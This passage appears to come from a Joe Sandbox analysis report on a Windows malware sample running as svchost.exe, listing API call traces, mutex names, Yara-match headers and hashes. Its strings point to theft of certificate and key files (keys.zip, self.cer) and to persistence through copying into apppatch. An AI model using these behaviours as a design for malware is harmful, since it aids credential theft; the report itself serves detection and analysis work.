                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAFC76
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAFC88
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAFC98
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CAFCAA
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CAFCAD
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CAFCBA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CAFCBD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$CreateFileHeap$AdminDirectoryFolderMakeSystemUser$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                              • String ID: Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$\*.bk$a23c4015$keys\$path.txt
                                                                                                                                                                                                              • API String ID: 959110331-1137149671
                                                                                                                                                                                                              • Opcode ID: cc7c550468e16bb9ab7cd2affeff78467e01f8b347cac8ccac5639ccfe3ec6ab
                                                                                                                                                                                                              • Instruction ID: cb573f0c709fb7f9953a8cda124cecd140ee83c72b1adfa183949a1b824f0a99
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc7c550468e16bb9ab7cd2affeff78467e01f8b347cac8ccac5639ccfe3ec6ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B911A30D417069FEB115B78A828BAF7BE8EF4A745F548658E847DB340DB71CA14C7A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02C97C80: IsUserAnAdmin.SHELL32 ref: 02C97C8A
                                                                                                                                                                                                                • Part of subcall function 02C97C80: memset.MSVCRT ref: 02C97CC1
                                                                                                                                                                                                                • Part of subcall function 02C97C80: memset.MSVCRT ref: 02C97CD9
                                                                                                                                                                                                                • Part of subcall function 02C97C80: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,74DEF380), ref: 02C97CFB
                                                                                                                                                                                                                • Part of subcall function 02C97C80: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,74DEF380), ref: 02C97D21
                                                                                                                                                                                                                • Part of subcall function 02C97C80: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,74DEF380), ref: 02C97DAD
                                                                                                                                                                                                                • Part of subcall function 02C97C80: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,74DEF380), ref: 02C97DB4
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C98105
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02C98112
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C98124
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9812D
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C98145
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C98157
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,5DD2BD0Ba,5dd2bd8aa), ref: 02C98162
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C98165
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C98172
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C98175
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,5DD2BD0Ba,5dd2bd8aa), ref: 02C98182
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C98185
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C98192
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C98195
                                                                                                                                                                                                              • SetCaretBlinkTime.USER32(000000FF), ref: 02C981A7
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 02C981D5
                                                                                                                                                                                                              • StrToIntA.SHLWAPI(00000000,5DD2BD0Ba,5dd2bd8aa), ref: 02C98205
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,5DD2BD0Ba,5dd2bd8aa), ref: 02C98215
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C98218
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C98225
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C98228
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,5DD2BD0Ba,5dd2bd8aa), ref: 02C98235
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C98238
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C98245
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C98248
                                                                                                                                                                                                              • Sleep.KERNEL32(00001388,5DD2BD0Ba,5dd2bd8aa), ref: 02C98253
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 02C98285
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 02C982A5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C982BD
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C982CF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C982F2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C9830C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
                                                                                                                                                                                                              • String ID: 5DD2BD0Ba$5dd2bd8aa$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                              • API String ID: 2871222221-1995695911
                                                                                                                                                                                                              • Opcode ID: 62725fdf5eeb8ba2a3e47bc40511ee53caa8584116eda80584b1c56245e70950
                                                                                                                                                                                                              • Instruction ID: 745174ee79929c9db7e1840aa9d9f98417ccc6806d125aa16d3c86e429304b9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62725fdf5eeb8ba2a3e47bc40511ee53caa8584116eda80584b1c56245e70950
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD51C371A82711AFEF20AB709C0CF6B37ADAF85795F844B14F919DB180DB74D910CAA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAC86F
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CAC8A7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAC8E7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAC8F1
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAC8F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAC90A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAC911
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,crypto), ref: 02CAC923
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,self.cer), ref: 02CAC936
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,self.pub), ref: 02CAC947
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CAC992
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CAC99F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                              • String ID: A23C41FB$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                              • API String ID: 3980609930-3391077804
                                                                                                                                                                                                              • Opcode ID: 2e08d2a1f217b8c4356707c072d71cc47e0e5d15bef7550149fd31b5c0169b02
                                                                                                                                                                                                              • Instruction ID: 5d24d94c4678d07704828239a1d75a94f7addd481bf9d203b8f71fb115b4e544
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e08d2a1f217b8c4356707c072d71cc47e0e5d15bef7550149fd31b5c0169b02
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC917A30D8121A9FDB21DB74D868BEE7BE8BF89748F044596E94AD7240DB709B04CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,759A5430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 3422789474-2746444292
                                                                                                                                                                                                              • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAEB4E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4093), ref: 02CAEB7A
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAEBBD
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAEBC3
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAEBCB
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAEBDC
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAEBE3
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CAEC1B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CAEC28
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4093,?,?), ref: 02CAEC67
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02CAECA5
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAECAC
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAECB4
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02CAECC5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAECCC
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CAED06
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CAED31
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000000,?), ref: 02CAED55
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000006), ref: 02CAED72
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAED79
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAED8B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAED9C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CAEDAB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CAEDAE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CAEDBB
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CAEDBE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorHeapLastPath$CreateDirectoryFile$AdminAttributesBackslashFolderHandleMakeMutexProcessSystemUser$CloseCurrentDeleteFreeInformationReleaseSleepValidatememset
                                                                                                                                                                                                              • String ID: Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$a23c4093$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 1472338570-4176102497
                                                                                                                                                                                                              • Opcode ID: f55dadcc47f390a4d74271d423e233301c1e4a5feddc7d0163dfa1746b0bbda8
                                                                                                                                                                                                              • Instruction ID: 01d6a2ffbb862a37625a9261cb7f969fa19f0b9d547f5213795a57046c70725b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f55dadcc47f390a4d74271d423e233301c1e4a5feddc7d0163dfa1746b0bbda8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7713A30D413569FDB218B34DC6CBEA7BE8AF86745F4486A4E989D7240DB70DA44CBD0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,7604DB30), ref: 00402AAB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 00402AE4
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                              • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                              • API String ID: 4049655197-3112416296
                                                                                                                                                                                                              • Opcode ID: 29e1a8a2fb924a41aaaa96706548a4c43bedaf2d15c95e08a4fa1e443ebad758
                                                                                                                                                                                                              • Instruction ID: 5ff553944d99263ee06e3162097b0b7c6440a9b95b570a66abc1ee1896f9e821
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29e1a8a2fb924a41aaaa96706548a4c43bedaf2d15c95e08a4fa1e443ebad758
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28716FB15043419BC710EF609E9C96BBBE8BBD8300F44493EF786B72A1DB749944CB99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
                                                                                                                                                                                                              • String ID: %s.DBF$%s.dbf$r+b$rb+
                                                                                                                                                                                                              • API String ID: 3942648141-1626032180
                                                                                                                                                                                                              • Opcode ID: 40fdfdb344cf135bf284accf5fd8a6d75ec0c74c7bfc1abe0fe54f567823fe97
                                                                                                                                                                                                              • Instruction ID: 13eabddbf32859ac7956d39ec59096ddc2f525dc1a56aded140d342c66d49031
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40fdfdb344cf135bf284accf5fd8a6d75ec0c74c7bfc1abe0fe54f567823fe97
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15D128B1A042425FC7218F3D8CB47B6BFF6AF86258B584769D889CB341E736DA09C750
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                              • String ID: 00-->$<Actions $p=<u
                                                                                                                                                                                                              • API String ID: 3028510665-3770785300
                                                                                                                                                                                                              • Opcode ID: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction ID: bc67798b7604906b9ac94ea6a24e9e769d05a344691ee016a8b24aa6f3249a27
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aec559f448f2fa9d4b5295e0762ae784be18bfa84c22532a43d07e7593ce3d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62A1CEB25043119BC720DF64CC49F5B7BA8EFC8751F048A29FA49A7391D774EA04CB99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
